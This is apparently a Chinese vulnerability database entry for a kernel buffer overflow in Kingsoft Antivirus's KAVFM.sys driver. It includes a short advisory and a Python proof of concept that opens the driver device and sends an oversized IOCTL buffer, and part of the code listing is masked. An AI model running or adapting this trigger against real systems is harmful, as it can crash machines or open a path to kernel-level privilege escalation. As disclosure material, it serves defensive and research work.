金山毒霸KAVFM.sys驱动IOCTL处理内核缓冲区溢出漏洞

基本字段

漏洞编号:
SSV-20119
披露/发现时间:
未知
提交时间:
2010-09-17
漏洞等级:
漏洞类别:
本地溢出
影响组件:
Kingsoft Antivirus
(2010.04.26.648)
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

BUGTRAQ ID: 43173

金山毒霸是一种个人电脑安全防护软件,集合了查毒、杀毒、实时监控、垃圾邮件过滤、防网页挂马和隐私数据保护等实用性强的功能于一身。

本地用户可以通过向金山毒霸所安装的KAVFM.sys驱动提交恶意IOCTL请求触发缓冲区溢出,导致执行任意内核态代码。

Kingsoft Antivirus 2010.04.26.648 厂商补丁:

Kingsoft Corp

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kingsoft.com/

共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.2KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/python
#################################################################
#
# Title: Kingsoft Antivirus Kernel Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.duba.net
# Platform: Windows XPSP3 Chinese Simplified
# Tested: Kingsoft Antivirus v2010.04.26.648
# Vulnerable: Kingsoft Antivirus <=v2010.04.26.648
# Vulnerable App: http://down10b.zol.com.cn/shadu/KAV100625_DOWN_10_166.zip?key=314e0cb9ea82720d90caae96bb918009
#################################################################
# Code :
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
DEVICE_NAME = "\\\\.\\kavfm"
dwReturn = c_ulong()
out_size = 1024
in_size = 1024
in_data = ''
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
in_data=1024*'\x80'
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x80030004, in_data,500, 0, 0,byref(dwReturn), None)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1264
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负